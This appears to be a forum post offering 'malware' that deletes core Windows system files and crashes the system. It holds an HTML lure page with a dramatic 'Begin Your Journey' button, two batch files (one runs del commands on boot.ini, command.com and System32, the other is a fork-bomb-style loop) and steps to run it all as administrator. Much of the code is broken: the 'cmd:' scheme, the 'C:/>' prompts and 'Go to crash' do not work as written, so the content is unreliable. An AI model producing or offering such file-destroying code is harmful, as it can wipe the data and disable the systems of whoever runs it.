Hello programmers, wanna try this new malware program which deletes all the main system softwares as well as crashes the windows system.



Main HTML code:

<!DOCTYPE html>

<html lang="en">

<head>    <meta charset="UTF-8">

    <meta name="viewport" content="width=device-width, initial-scale=1.0">

    <title>Execute Batch Files</title>

    <script>

        function executeBatchFiles() {

            // Execute first batch file

            setTimeout(function() {

                // Run the first batch file

                location.href = 'cmd:first.bat';

            }, 0); // Execute immediately


            // Execute second batch file after 10 seconds

            setTimeout(function() {

                // Run the second batch file

                location.href = 'cmd:second.bat';

            }, 10000); // 10 seconds delay

        }

    </script>

</head>

<body>

    <style>

    body {

            background-color: #000000;

            color: #ffffff;

            font-family: 'Courier New', Courier, monospace;

            margin: 0;

            padding: 20px;

        }

        .container {

            max-width: 600px;

            margin: 0 auto;

            text-align: left;

        }

        .description {

            font-size: 20px;

            margin-bottom: 20px;

            color: green;

        }

        .execute-btn {

            background-color: #ff0000;

            color: #ffffff;

            border: none;

            padding: 10px 20px;

            font-size: 16px;

            cursor: pointer;

        }

        .execute-btn:hover {

            background-color: #b30000;

        }

        </style>

    

    <div class="container">

        <p class="description">

            Are you ready to delve into the darkest depths of the digital realm? Brace yourself as you wield the power to execute forbidden commands that manipulate the very fabric of your computer's existence. Enter the realm of the unknown, where every keystroke may unleash unforeseen consequences upon your unsuspecting machine.

        </p>

        <p class="description">

            This enigmatic tool, shrouded in mystery, grants you the ability to execute batch files with a mere click of a button. But beware, for with great power comes great peril. Each execution carries the weight of uncertainty, as the command-line interface pulses with ominous energy, beckoning you to tread cautiously into the abyss.

        </p>

        <p class="description">

            Dare you unlock the secrets hidden within the confines of these cryptic commands? Will you emerge unscathed, or will your journey through the digital darkness leave your computer's fate hanging in the balance? The choice is yours, adventurer, but remember: in the realm of hacking, there are no guarantees, only the thrill of the unknown.

        </p>

        <button class="execute-btn" onclick="executeBatchFiles()">Begin Your Journey</button>

    </div>

</body>

</html>



"Instruction"


//The first batch file (first.bat) is executed immediately using setTimeout with a delay of 0 milliseconds.


//The second batch file (second.bat) is executed after a delay of 10 seconds (10000 milliseconds) using another setTimeout function.


//Replace 'cmd:first.bat' and 'cmd:second.bat' with the actual filenames of your batch files. Make sure to place both batch files in the same directory as your HTML file. Additionally, ensure that the batch files contain the commands you want to execute.


 //First batch file code-

@echo off

Command.com

C:/> del mscofig.sys

C:/> del boot.ini

C:/> del command.com

C:/> del System32


//Second batch file code-

@echo off

:Crash

Start

Go to crash


// copy the codes in notepad and save it with the extension .bat 

// After putting both the batch files in the same folder containing the main html code, run the main html code as administrator.